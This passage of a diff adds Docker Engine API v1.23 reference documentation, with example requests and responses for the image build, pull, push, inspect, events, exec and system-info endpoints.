+        "Size": 0,
+        "VirtualSize": 2429728,
+        "Labels": {}
+      }
+    ]
+
+The response shows a single image `Id` associated with two repositories
+(`RepoTags`): `localhost:5000/test/busybox`: and `playdate`. A caller can use
+either of the `RepoTags` values `localhost:5000/test/busybox:latest` or
+`playdate:latest` to reference the image.
+
+You can also use `RepoDigests` values to reference an image. In this response,
+the array has only one reference and that is to the
+`localhost:5000/test/busybox` repository; the `playdate` repository has no
+digest. You can reference this digest using the value:
+`localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d...`
+
+See the `docker run` and `docker build` commands for examples of digest and tag
+references on the command line.
+
+**Query parameters**:
+
+-   **all** – 1/True/true or 0/False/false, default false
+-   **filters** – a JSON encoded value of the filters (a map[string][]string) to process on the images list. Available filters:
+  -   `dangling=true`
+  -   `label=key` or `label="key=value"` of an image label
+-   **filter** - only return images with the specified name
+
+#### Build image from a Dockerfile
+
+`POST /build`
+
+Build an image from a Dockerfile
+
+**Example request**:
+
+    POST /v1.23/build HTTP/1.1
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"stream": "Step 1/5..."}
+    {"stream": "..."}
+    {"error": "Error...", "errorDetail": {"code": 123, "message": "Error..."}}
+
+The input stream must be a `tar` archive compressed with one of the
+following algorithms: `identity` (no compression), `gzip`, `bzip2`, `xz`.
+
+The archive must include a build instructions file, typically called
+`Dockerfile` at the archive's root. The `dockerfile` parameter may be
+used to specify a different build instructions file. To do this, its value must be
+the path to the alternate build instructions file to use.
+
+The archive may include any number of other files,
+which are accessible in the build context (See the [*ADD build
+command*](../reference/builder.md#add)).
+
+The Docker daemon performs a preliminary validation of the `Dockerfile` before
+starting the build, and returns an error if the syntax is incorrect. After that,
+each instruction is run one-by-one until the ID of the new image is output.
+
+The build is canceled if the client drops the connection by quitting
+or being killed.
+
+**Query parameters**:
+
+-   **dockerfile** - Path within the build context to the `Dockerfile`. This is
+        ignored if `remote` is specified and points to an external `Dockerfile`.
+-   **t** – A name and optional tag to apply to the image in the `name:tag` format.
+        If you omit the `tag` the default `latest` value is assumed.
+        You can provide one or more `t` parameters.
+-   **remote** – A Git repository URI or HTTP/HTTPS context URI. If the
+        URI points to a single text file, the file's contents are placed into
+        a file called `Dockerfile` and the image is built from that file. If
+        the URI points to a tarball, the file is downloaded by the daemon and
+        the contents therein used as the context for the build. If the URI
+        points to a tarball and the `dockerfile` parameter is also specified,
+        there must be a file with the corresponding path inside the tarball.
+-   **q** – Suppress verbose build output.
+-   **nocache** – Do not use the cache when building the image.
+-   **pull** - Attempt to pull the image even if an older image exists locally.
+-   **rm** - Remove intermediate containers after a successful build (default behavior).
+-   **forcerm** - Always remove intermediate containers (includes `rm`).
+-   **memory** - Set memory limit for build.
+-   **memswap** - Total memory (memory + swap), `-1` to enable unlimited swap.
+-   **cpushares** - CPU shares (relative weight).
+-   **cpusetcpus** - CPUs in which to allow execution (e.g., `0-3`, `0,1`).
+-   **cpuperiod** - The length of a CPU period in microseconds.
+-   **cpuquota** - Microseconds of CPU time that the container can get in a CPU period.
+-   **buildargs** – JSON map of string pairs for build-time variables. Users pass
+        these values at build-time. Docker uses the `buildargs` as the environment
+        context for command(s) run via the Dockerfile's `RUN` instruction or for
+        variable expansion in other Dockerfile instructions. This is not meant for
+        passing secret values. [Read more about the buildargs instruction](../reference/builder.md#arg)
+-   **shmsize** - Size of `/dev/shm` in bytes. The size must be greater than 0.  If omitted the system uses 64MB.
+-   **labels** – JSON map of string pairs for labels to set on the image.
+
+**Request Headers**:
+
+-   **Content-type** – Set to `"application/tar"`.
+-   **X-Registry-Config** – A base64-url-safe-encoded Registry Auth Config JSON
+        object with the following structure:
+
+            {
+                "docker.example.com": {
+                    "username": "janedoe",
+                    "password": "hunter2"
+                },
+                "https://index.docker.io/v1/": {
+                    "username": "mobydock",
+                    "password": "conta1n3rize14"
+                }
+            }
+
+    This object maps the hostname of a registry to an object containing the
+    "username" and "password" for that registry. Multiple registries may
+    be specified as the build may be based on an image requiring
+    authentication to pull from any arbitrary registry. Only the registry
+    domain name (and port if not the default "443") are required. However
+    (for legacy reasons) the "official" Docker, Inc. hosted registry must
+    be specified with both a "https://" prefix and a "/v1/" suffix even
+    though Docker will prefer to use the v2 registry API.
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Create an image
+
+`POST /images/create`
+
+Create an image either by pulling it from the registry or by importing it
+
+**Example request**:
+
+    POST /v1.23/images/create?fromImage=busybox&tag=latest HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"status": "Pulling..."}
+    {"status": "Pulling", "progress": "1 B/ 100 B", "progressDetail": {"current": 1, "total": 100}}
+    {"error": "Invalid..."}
+    ...
+
+When using this endpoint to pull an image from the registry, the
+`X-Registry-Auth` header can be used to include
+a base64-encoded AuthConfig object.
+
+**Query parameters**:
+
+-   **fromImage** – Name of the image to pull. The name may include a tag or
+        digest. This parameter may only be used when pulling an image.
+        The pull is cancelled if the HTTP connection is closed.
+-   **fromSrc** – Source to import.  The value may be a URL from which the image
+        can be retrieved or `-` to read the image from the request body.
+        This parameter may only be used when importing an image.
+-   **repo** – Repository name given to an image when it is imported.
+        The repo may include a tag. This parameter may only be used when importing
+        an image.
+-   **tag** – Tag or digest. If empty when pulling an image, this causes all tags
+        for the given image to be pulled.
+
+**Request Headers**:
+
+-   **X-Registry-Auth** – base64-encoded AuthConfig object, containing either login information, or a token
+    - Credential based login:
+
+        ```
+    {
+            "username": "jdoe",
+            "password": "secret",
+            "email": "jdoe@acme.com"
+    }
+        ```
+
+    - Token based login:
+
+        ```
+    {
+            "identitytoken": "9cbaf023786cd7..."
+    }
+        ```
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** - repository does not exist or no read access
+-   **500** – server error
+
+
+
+#### Inspect an image
+
+`GET /images/(name)/json`
+
+Return low-level information on the image `name`
+
+**Example request**:
+
+    GET /v1.23/images/example/json HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+       "Id" : "sha256:85f05633ddc1c50679be2b16a0479ab6f7637f8884e0cfe0f4d20e1ebb3d6e7c",
+       "Container" : "cb91e48a60d01f1e27028b4fc6819f4f290b3cf12496c8176ec714d0d390984a",
+       "Comment" : "",
+       "Os" : "linux",
+       "Architecture" : "amd64",
+       "Parent" : "sha256:91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c",
+       "ContainerConfig" : {
+          "Tty" : false,
+          "Hostname" : "e611e15f9c9d",
+          "Volumes" : null,
+          "Domainname" : "",
+          "AttachStdout" : false,
+          "PublishService" : "",
+          "AttachStdin" : false,
+          "OpenStdin" : false,
+          "StdinOnce" : false,
+          "NetworkDisabled" : false,
+          "OnBuild" : [],
+          "Image" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c",
+          "User" : "",
+          "WorkingDir" : "",
+          "Entrypoint" : null,
+          "MacAddress" : "",
+          "AttachStderr" : false,
+          "Labels" : {
+             "com.example.license" : "GPL",
+             "com.example.version" : "1.0",
+             "com.example.vendor" : "Acme"
+          },
+          "Env" : [
+             "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
+          ],
+          "ExposedPorts" : null,
+          "Cmd" : [
+             "/bin/sh",
+             "-c",
+             "#(nop) LABEL com.example.vendor=Acme com.example.license=GPL com.example.version=1.0"
+          ]
+       },
+       "DockerVersion" : "1.9.0-dev",
+       "VirtualSize" : 188359297,
+       "Size" : 0,
+       "Author" : "",
+       "Created" : "2015-09-10T08:30:53.26995814Z",
+       "GraphDriver" : {
+          "Name" : "aufs",
+          "Data" : null
+       },
+       "RepoDigests" : [
+          "localhost:5000/test/busybox/example@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf"
+       ],
+       "RepoTags" : [
+          "example:1.0",
+          "example:latest",
+          "example:stable"
+       ],
+       "Config" : {
+          "Image" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c",
+          "NetworkDisabled" : false,
+          "OnBuild" : [],
+          "StdinOnce" : false,
+          "PublishService" : "",
+          "AttachStdin" : false,
+          "OpenStdin" : false,
+          "Domainname" : "",
+          "AttachStdout" : false,
+          "Tty" : false,
+          "Hostname" : "e611e15f9c9d",
+          "Volumes" : null,
+          "Cmd" : [
+             "/bin/bash"
+          ],
+          "ExposedPorts" : null,
+          "Env" : [
+             "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
+          ],
+          "Labels" : {
+             "com.example.vendor" : "Acme",
+             "com.example.version" : "1.0",
+             "com.example.license" : "GPL"
+          },
+          "Entrypoint" : null,
+          "MacAddress" : "",
+          "AttachStderr" : false,
+          "WorkingDir" : "",
+          "User" : ""
+       },
+       "RootFS": {
+           "Type": "layers",
+           "Layers": [
+               "sha256:1834950e52ce4d5a88a1bbd131c537f4d0e56d10ff0dd69e66be3b7dfa9df7e6",
+               "sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef"
+           ]
+       }
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **500** – server error
+
+#### Get the history of an image
+
+`GET /images/(name)/history`
+
+Return the history of the image `name`
+
+**Example request**:
+
+    GET /v1.23/images/ubuntu/history HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+        {
+            "Id": "3db9c44f45209632d6050b35958829c3a2aa256d81b9a7be45b362ff85c54710",
+            "Created": 1398108230,
+            "CreatedBy": "/bin/sh -c #(nop) ADD file:eb15dbd63394e063b805a3c32ca7bf0266ef64676d5a6fab4801f2e81e2a5148 in /",
+            "Tags": [
+                "ubuntu:lucid",
+                "ubuntu:10.04"
+            ],
+            "Size": 182964289,
+            "Comment": ""
+        },
+        {
+            "Id": "6cfa4d1f33fb861d4d114f43b25abd0ac737509268065cdfd69d544a59c85ab8",
+            "Created": 1398108222,
+            "CreatedBy": "/bin/sh -c #(nop) MAINTAINER Tianon Gravi <admwiggin@gmail.com> - mkimage-debootstrap.sh -i iproute,iputils-ping,ubuntu-minimal -t lucid.tar.xz lucid http://archive.ubuntu.com/ubuntu/",
+            "Tags": null,
+            "Size": 0,
+            "Comment": ""
+        },
+        {
+            "Id": "511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158",
+            "Created": 1371157430,
+            "CreatedBy": "",
+            "Tags": [
+                "scratch12:latest",
+                "scratch:latest"
+            ],
+            "Size": 0,
+            "Comment": "Imported from -"
+        }
+    ]
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **500** – server error
+
+#### Push an image on the registry
+
+`POST /images/(name)/push`
+
+Push the image `name` on the registry
+
+**Example request**:
+
+    POST /v1.23/images/test/push HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"status": "Pushing..."}
+    {"status": "Pushing", "progress": "1/? (n/a)", "progressDetail": {"current": 1}}}
+    {"error": "Invalid..."}
+    ...
+
+If you wish to push an image on to a private registry, that image must already have a tag
+into a repository which references that registry `hostname` and `port`.  This repository name should
+then be used in the URL. This duplicates the command line's flow.
+
+The push is cancelled if the HTTP connection is closed.
+
+**Example request**:
+
+    POST /v1.23/images/registry.acme.com:5000/test/push HTTP/1.1
+
+
+**Query parameters**:
+
+-   **tag** – The tag to associate with the image on the registry. This is optional.
+
+**Request Headers**:
+
+-   **X-Registry-Auth** – base64-encoded AuthConfig object, containing either login information, or a token
+    - Credential based login:
+
+        ```
+    {
+            "username": "jdoe",
+            "password": "secret",
+            "email": "jdoe@acme.com",
+    }
+        ```
+
+    - Identity token based login:
+
+        ```
+    {
+            "identitytoken": "9cbaf023786cd7..."
+    }
+        ```
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **500** – server error
+
+#### Tag an image into a repository
+
+`POST /images/(name)/tag`
+
+Tag the image `name` into a repository
+
+**Example request**:
+
+    POST /v1.23/images/test/tag?repo=myrepo&force=0&tag=v42 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+
+**Query parameters**:
+
+-   **repo** – The repository to tag in
+-   **force** – 1/True/true or 0/False/false, default false
+-   **tag** - The new tag name
+
+**Status codes**:
+
+-   **201** – no error
+-   **400** – bad parameter
+-   **404** – no such image
+-   **409** – conflict
+-   **500** – server error
+
+#### Remove an image
+
+`DELETE /images/(name)`
+
+Remove the image `name` from the filesystem
+
+**Example request**:
+
+    DELETE /v1.23/images/test HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-type: application/json
+
+    [
+     {"Untagged": "3e2f21a89f"},
+     {"Deleted": "3e2f21a89f"},
+     {"Deleted": "53b4f83ac9"}
+    ]
+
+**Query parameters**:
+
+-   **force** – 1/True/true or 0/False/false, default false
+-   **noprune** – 1/True/true or 0/False/false, default false
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **409** – conflict
+-   **500** – server error
+
+#### Search images
+
+`GET /images/search`
+
+Search for an image on [Docker Hub](https://hub.docker.com).
+
+> **Note**:
+> The response keys have changed from API v1.6 to reflect the JSON
+> sent by the registry server to the docker daemon's request.
+
+**Example request**:
+
+    GET /v1.23/images/search?term=sshd HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+            {
+                "description": "",
+                "is_official": false,
+                "is_automated": false,
+                "name": "wma55/u1210sshd",
+                "star_count": 0
+            },
+            {
+                "description": "",
+                "is_official": false,
+                "is_automated": false,
+                "name": "jdswinbank/sshd",
+                "star_count": 0
+            },
+            {
+                "description": "",
+                "is_official": false,
+                "is_automated": false,
+                "name": "vgauthier/sshd",
+                "star_count": 0
+            }
+    ...
+    ]
+
+**Query parameters**:
+
+-   **term** – term to search
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+### 2.3 Misc
+
+#### Check auth configuration
+
+`POST /auth`
+
+Validate credentials for a registry and get identity token,
+if available, for accessing the registry without password.
+
+**Example request**:
+
+    POST /v1.23/auth HTTP/1.1
+    Content-Type: application/json
+
+    {
+         "username": "hannibal",
+         "password": "xxxx",
+         "serveraddress": "https://index.docker.io/v1/"
+    }
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+    {
+         "Status": "Login Succeeded",
+         "IdentityToken": "9cbaf023786cd7..."
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **204** – no error
+-   **500** – server error
+
+#### Display system-wide information
+
+`GET /info`
+
+Display system-wide information
+
+**Example request**:
+
+    GET /v1.23/info HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+        "Architecture": "x86_64",
+        "ClusterStore": "etcd://localhost:2379",
+        "CgroupDriver": "cgroupfs",
+        "Containers": 11,
+        "ContainersRunning": 7,
+        "ContainersStopped": 3,
+        "ContainersPaused": 1,
+        "CpuCfsPeriod": true,
+        "CpuCfsQuota": true,
+        "Debug": false,
+        "DockerRootDir": "/var/lib/docker",
+        "Driver": "btrfs",
+        "DriverStatus": [[""]],
+        "ExecutionDriver": "native-0.1",
+        "ExperimentalBuild": false,
+        "HttpProxy": "http://test:test@localhost:8080",
+        "HttpsProxy": "https://test:test@localhost:8080",
+        "ID": "7TRN:IPZB:QYBB:VPBQ:UMPP:KARE:6ZNR:XE6T:7EWV:PKF4:ZOJD:TPYS",
+        "IPv4Forwarding": true,
+        "Images": 16,
+        "IndexServerAddress": "https://index.docker.io/v1/",
+        "InitPath": "/usr/bin/docker",
+        "InitSha1": "",
+        "KernelMemory": true,
+        "KernelVersion": "3.12.0-1-amd64",
+        "Labels": [
+            "storage=ssd"
+        ],
+        "MemTotal": 2099236864,
+        "MemoryLimit": true,
+        "NCPU": 1,
+        "NEventsListener": 0,
+        "NFd": 11,
+        "NGoroutines": 21,
+        "Name": "prod-server-42",
+        "NoProxy": "9.81.1.160",
+        "OomKillDisable": true,
+        "OSType": "linux",
+        "OperatingSystem": "Boot2Docker",
+        "Plugins": {
+            "Volume": [
+                "local"
+            ],
+            "Network": [
+                "null",
+                "host",
+                "bridge"
+            ]
+        },
+        "RegistryConfig": {
+            "IndexConfigs": {
+                "docker.io": {
+                    "Mirrors": null,
+                    "Name": "docker.io",
+                    "Official": true,
+                    "Secure": true
+                }
+            },
+            "InsecureRegistryCIDRs": [
+                "127.0.0.0/8"
+            ]
+        },
+        "ServerVersion": "1.9.0",
+        "SwapLimit": false,
+        "SystemStatus": [["State", "Healthy"]],
+        "SystemTime": "2015-03-10T11:11:23.730591467-07:00"
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Show the docker version information
+
+`GET /version`
+
+Show the docker version information
+
+**Example request**:
+
+    GET /v1.23/version HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+         "Version": "1.11.0",
+         "Os": "linux",
+         "KernelVersion": "3.19.0-23-generic",
+         "GoVersion": "go1.4.2",
+         "GitCommit": "e75da4b",
+         "Arch": "amd64",
+         "ApiVersion": "1.23",
+         "BuildTime": "2015-12-01T07:09:13.444803460+00:00",
+         "Experimental": true
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Ping the docker server
+
+`GET /_ping`
+
+Ping the docker server
+
+**Example request**:
+
+    GET /v1.23/_ping HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: text/plain
+
+    OK
+
+**Status codes**:
+
+-   **200** - no error
+-   **500** - server error
+
+#### Create a new image from a container's changes
+
+`POST /commit`
+
+Create a new image from a container's changes
+
+**Example request**:
+
+    POST /v1.23/commit?container=44c004db4b17&comment=message&repo=myrepo HTTP/1.1
+    Content-Type: application/json
+
+    {
+         "Hostname": "",
+         "Domainname": "",
+         "User": "",
+         "AttachStdin": false,
+         "AttachStdout": true,
+         "AttachStderr": true,
+         "Tty": false,
+         "OpenStdin": false,
+         "StdinOnce": false,
+         "Env": null,
+         "Cmd": [
+                 "date"
+         ],
+         "Mounts": [
+           {
+             "Source": "/data",
+             "Destination": "/data",
+             "Mode": "ro,Z",
+             "RW": false
+           }
+         ],
+         "Labels": {
+                 "key1": "value1",
+                 "key2": "value2"
+          },
+         "WorkingDir": "",
+         "NetworkDisabled": false,
+         "ExposedPorts": {
+                 "22/tcp": {}
+         }
+    }
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+    Content-Type: application/json
+
+    {"Id": "596069db4bf5"}
+
+**JSON parameters**:
+
+-  **config** - the container's configuration
+
+**Query parameters**:
+
+-   **container** – source container
+-   **repo** – repository
+-   **tag** – tag
+-   **comment** – commit message
+-   **author** – author (e.g., "John Hannibal Smith
+    <[hannibal@a-team.com](mailto:hannibal%40a-team.com)>")
+-   **pause** – 1/True/true or 0/False/false, whether to pause the container before committing
+-   **changes** – Dockerfile instructions to apply while committing
+
+**Status codes**:
+
+-   **201** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Monitor Docker's events
+
+`GET /events`
+
+Get container events from docker, in real time via streaming.
+
+Docker containers report the following events:
+
+    attach, commit, copy, create, destroy, die, exec_create, exec_start, export, kill, oom, pause, rename, resize, restart, start, stop, top, unpause, update
+
+Docker images report the following events:
+
+    delete, import, pull, push, tag, untag
+
+Docker volumes report the following events:
+
+    create, mount, unmount, destroy
+
+Docker networks report the following events:
+
+    create, connect, disconnect, destroy
+
+**Example request**:
+
+    GET /v1.23/events?since=1374067924
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+    Server: Docker/1.11.0 (linux)
+    Date: Fri, 29 Apr 2016 15:18:06 GMT
+    Transfer-Encoding: chunked
+
+    {
+      "status": "pull",
+      "id": "alpine:latest",
+      "Type": "image",
+      "Action": "pull",
+      "Actor": {
+        "ID": "alpine:latest",
+        "Attributes": {
+          "name": "alpine"
+        }
+      },
+      "time": 1461943101,
+      "timeNano": 1461943101301854122
+    }
+    {
+      "status": "create",
+      "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+      "from": "alpine",
+      "Type": "container",
+      "Action": "create",
+      "Actor": {
+        "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+        "Attributes": {
+          "com.example.some-label": "some-label-value",
+          "image": "alpine",
+          "name": "my-container"
+        }
+      },
+      "time": 1461943101,
+      "timeNano": 1461943101381709551
+    }
+    {
+      "status": "attach",
+      "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+      "from": "alpine",
+      "Type": "container",
+      "Action": "attach",
+      "Actor": {
+        "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+        "Attributes": {
+          "com.example.some-label": "some-label-value",
+          "image": "alpine",
+          "name": "my-container"
+        }
+      },
+      "time": 1461943101,
+      "timeNano": 1461943101383858412
+    }
+    {
+      "Type": "network",
+      "Action": "connect",
+      "Actor": {
+        "ID": "7dc8ac97d5d29ef6c31b6052f3938c1e8f2749abbd17d1bd1febf2608db1b474",
+        "Attributes": {
+          "container": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+          "name": "bridge",
+          "type": "bridge"
+        }
+      },
+      "time": 1461943101,
+      "timeNano": 1461943101394865557
+    }
+    {
+      "status": "start",
+      "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+      "from": "alpine",
+      "Type": "container",
+      "Action": "start",
+      "Actor": {
+        "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+        "Attributes": {
+          "com.example.some-label": "some-label-value",
+          "image": "alpine",
+          "name": "my-container"
+        }
+      },
+      "time": 1461943101,
+      "timeNano": 1461943101607533796
+    }
+    {
+      "status": "resize",
+      "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+      "from": "alpine",
+      "Type": "container",
+      "Action": "resize",
+      "Actor": {
+        "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+        "Attributes": {
+          "com.example.some-label": "some-label-value",
+          "height": "46",
+          "image": "alpine",
+          "name": "my-container",
+          "width": "204"
+        }
+      },
+      "time": 1461943101,
+      "timeNano": 1461943101610269268
+    }
+    {
+      "status": "die",
+      "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+      "from": "alpine",
+      "Type": "container",
+      "Action": "die",
+      "Actor": {
+        "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+        "Attributes": {
+          "com.example.some-label": "some-label-value",
+          "exitCode": "0",
+          "image": "alpine",
+          "name": "my-container"
+        }
+      },
+      "time": 1461943105,
+      "timeNano": 1461943105079144137
+    }
+    {
+      "Type": "network",
+      "Action": "disconnect",
+      "Actor": {
+        "ID": "7dc8ac97d5d29ef6c31b6052f3938c1e8f2749abbd17d1bd1febf2608db1b474",
+        "Attributes": {
+          "container": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+          "name": "bridge",
+          "type": "bridge"
+        }
+      },
+      "time": 1461943105,
+      "timeNano": 1461943105230860245
+    }
+    {
+      "status": "destroy",
+      "id": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+      "from": "alpine",
+      "Type": "container",
+      "Action": "destroy",
+      "Actor": {
+        "ID": "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743",
+        "Attributes": {
+          "com.example.some-label": "some-label-value",
+          "image": "alpine",
+          "name": "my-container"
+        }
+      },
+      "time": 1461943105,
+      "timeNano": 1461943105338056026
+    }
+
+**Query parameters**:
+
+-   **since** – Timestamp. Show all events created since timestamp and then stream
+-   **until** – Timestamp. Show events created until given timestamp and stop streaming
+-   **filters** – A json encoded value of the filters (a map[string][]string) to process on the event list. Available filters:
+  -   `container=<string>`; -- container to filter
+  -   `event=<string>`; -- event to filter
+  -   `image=<string>`; -- image to filter
+  -   `label=<string>`; -- image and container label to filter
+  -   `type=<string>`; -- either `container` or `image` or `volume` or `network`
+  -   `volume=<string>`; -- volume to filter
+  -   `network=<string>`; -- network to filter
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Get a tarball containing all images in a repository
+
+`GET /images/(name)/get`
+
+Get a tarball containing all images and metadata for the repository specified
+by `name`.
+
+If `name` is a specific name and tag (e.g. ubuntu:latest), then only that image
+(and its parents) are returned. If `name` is an image ID, similarly only that
+image (and its parents) are returned, but with the exclusion of the
+'repositories' file in the tarball, as there were no image names referenced.
+
+See the [image tarball format](#image-tarball-format) for more details.
+
+**Example request**
+
+    GET /v1.23/images/ubuntu/get
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/x-tar
+
+    Binary data stream
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Get a tarball containing all images
+
+`GET /images/get`
+
+Get a tarball containing all images and metadata for one or more repositories.
+
+For each value of the `names` parameter: if it is a specific name and tag (e.g.
+`ubuntu:latest`), then only that image (and its parents) are returned; if it is
+an image ID, similarly only that image (and its parents) are returned and there
+would be no names referenced in the 'repositories' file for this image ID.
+
+See the [image tarball format](#image-tarball-format) for more details.
+
+**Example request**
+
+    GET /v1.23/images/get?names=myname%2Fmyapp%3Alatest&names=busybox
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/x-tar
+
+    Binary data stream
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Load a tarball with a set of images and tags into docker
+
+`POST /images/load`
+
+Load a set of images and tags into a Docker repository.
+See the [image tarball format](#image-tarball-format) for more details.
+
+**Example request**
+
+    POST /v1.23/images/load
+    Content-Type: application/x-tar
+
+    Tarball in body
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+    Transfer-Encoding: chunked
+
+    {"status":"Loading layer","progressDetail":{"current":32768,"total":1292800},"progress":"[=                                                 ] 32.77 kB/1.293 MB","id":"8ac8bfaff55a"}
+    {"status":"Loading layer","progressDetail":{"current":65536,"total":1292800},"progress":"[==                                                ] 65.54 kB/1.293 MB","id":"8ac8bfaff55a"}
+    {"status":"Loading layer","progressDetail":{"current":98304,"total":1292800},"progress":"[===                                               ]  98.3 kB/1.293 MB","id":"8ac8bfaff55a"}
+    {"status":"Loading layer","progressDetail":{"current":131072,"total":1292800},"progress":"[=====                                             ] 131.1 kB/1.293 MB","id":"8ac8bfaff55a"}
+    ...
+    {"stream":"Loaded image: busybox:latest\n"}
+
+**Example response**:
+
+If the "quiet" query parameter is set to `true` / `1` (`?quiet=1`), progress
+details are suppressed, and only a confirmation message is returned once the
+action completes.
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+    Transfer-Encoding: chunked
+
+    {"stream":"Loaded image: busybox:latest\n"}
+
+**Query parameters**:
+
+-   **quiet** – Boolean value, suppress progress details during load. Defaults
+      to `0` / `false` if omitted.
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Image tarball format
+
+An image tarball contains one directory per image layer (named using its long ID),
+each containing these files:
+
+- `VERSION`: currently `1.0` - the file format version
+- `json`: detailed layer information, similar to `docker inspect layer_id`
+- `layer.tar`: A tarfile containing the filesystem changes in this layer
+
+The `layer.tar` file contains `aufs` style `.wh..wh.aufs` files and directories
+for storing attribute changes and deletions.
+
+If the tarball defines a repository, the tarball should also include a `repositories` file at
+the root that contains a list of repository and tag names mapped to layer IDs.
+
+```
+{"hello-world":
+    {"latest": "565a9d68a73f6706862bfe8409a7f659776d4d60a8d096eb4a3cbce6999cc2a1"}
+}
+```
+
+#### Exec Create
+
+`POST /containers/(id or name)/exec`
+
+Sets up an exec instance in a running container `id`
+
+**Example request**:
+
+    POST /v1.23/containers/e90e34656806/exec HTTP/1.1
+    Content-Type: application/json
+
+    {
+      "AttachStdin": true,
+      "AttachStdout": true,
+      "AttachStderr": true,
+      "Cmd": ["sh"],
+      "DetachKeys": "ctrl-p,ctrl-q",
+      "Privileged": true,
+      "Tty": true,
+      "User": "123:456"
+    }
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+    Content-Type: application/json
+
+    {
+         "Id": "f90e34656806",
+         "Warnings":[]
+    }
+
+**JSON parameters**:
+
+-   **AttachStdin** - Boolean value, attaches to `stdin` of the `exec` command.
+-   **AttachStdout** - Boolean value, attaches to `stdout` of the `exec` command.
+-   **AttachStderr** - Boolean value, attaches to `stderr` of the `exec` command.
+-   **DetachKeys** – Override the key sequence for detaching a
+        container. Format is a single character `[a-Z]` or `ctrl-<value>`
+        where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`.
+-   **Tty** - Boolean value to allocate a pseudo-TTY.
+-   **Cmd** - Command to run specified as a string or an array of strings.
+-   **Privileged** - Boolean value, runs the exec process with extended privileges.
+-   **User** - A string value specifying the user, and optionally, group to run
+        the exec process inside the container. Format is one of: `"user"`,
+        `"user:group"`, `"uid"`, or `"uid:gid"`.
+
+**Status codes**:
+
+-   **201** – no error
+-   **404** – no such container
+-   **409** - container is paused
+-   **500** - server error
+
+#### Exec Start
+
+`POST /exec/(id)/start`
+
+Starts a previously set up `exec` instance `id`. If `detach` is true, this API
+returns after starting the `exec` command. Otherwise, this API sets up an
+interactive session with the `exec` command.
+
+**Example request**:
+
